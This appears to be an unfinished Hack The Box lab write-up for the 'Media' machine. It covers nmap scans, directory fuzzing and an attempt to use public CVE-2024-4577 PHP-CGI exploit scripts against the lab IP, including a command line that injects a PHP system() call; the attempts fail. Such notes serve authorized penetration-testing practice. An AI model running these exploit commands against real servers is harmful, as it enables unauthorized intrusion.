HTB - MEDIA - JA Smith

# TAKEAWAYS - xxx --- # BLUF - xxx --- # Discover Ports & Services - `ping` test ![[images/Pasted image 20260401144758.png]] - windows based on TTL - `nmap` scan - light ![[images/Pasted image 20260401144904.png]] - `nmap` scan - detailed ![[images/Pasted image 20260401145416.png]] - `nmap` scan - UDP ![[images/Pasted image 20260401145804.png]] --- # Service Enum ## Port 80 (HTTP): Apache 2.4.56; PHP 8.1.17 ## Initial review - Visit page ![[images/Pasted image 20260401145035.png]] - Not much to see here - view source ![[images/Pasted image 20260401151031.png]] - request:response in `burp` ![[images/Pasted image 20260401151149.png]] - Few names ![[images/Pasted image 20260401145214.png]] - File upload button may work? > asks for a video file (compatible with Windows Media Player) ![[images/Pasted image 20260401145200.png]] ## Web fuzzing - Try `feroxbuster` - `feroxbuster` uses `raft-medium` by default but this can be changed - this is a lot of output ```bash feroxbuster -u http://10.129.13.168 ``` ![[images/Pasted image 20260401150050.png]] - Directory fuzzing - `raft-medium` ![[images/Pasted image 20260401150339.png]] - `assets` shows the explorer for all images > nothing useful ![[images/Pasted image 20260401150713.png]] - `2.3-medium` > nothing new ![[images/Pasted image 20260401150920.png]] - Subdomain fuzzing - `top1million-20000` > nothing ![[images/Pasted image 20260401151513.png]] - VHost fuzzing - `top1million-20000` ## Other Checks - Try `index.html` > default 404 - Try `index.php` > drops us to home page - Try random page > default 404 ![[images/Pasted image 20260401150529.png]] - No `robots.txt` and no `sitemap.xml` - `whatweb` scan ![[images/Pasted image 20260401151410.png]] - `searchsploit` for apache and php version - nothing for `apache` 2.4.56 - php 8.1.17 may have an exploit? ![[images/Pasted image 20260401151856.png]] ## PHP 8.1.17 - Review `php/webapps/52047.py` - Associated with `CVE-2024-4577` ![[images/Pasted image 20260401152205.png]] - Takes URL and command arguments - Getting errors ![[images/Pasted image 20260401153057.png]] - Try different command > returns the home page ```bash python3 52047.py http://10.129.13.168 dir ``` ![[images/Pasted image 20260401153839.png]] - Try https://github.com/watchtowrlabs/CVE-2024-4577 - Getting errors regarding the command ```bash python exploit.py --target http://10.129.13.168/index.php -c "<?php system('calc');?>" ``` ## File Upload --- # Privesc - xxx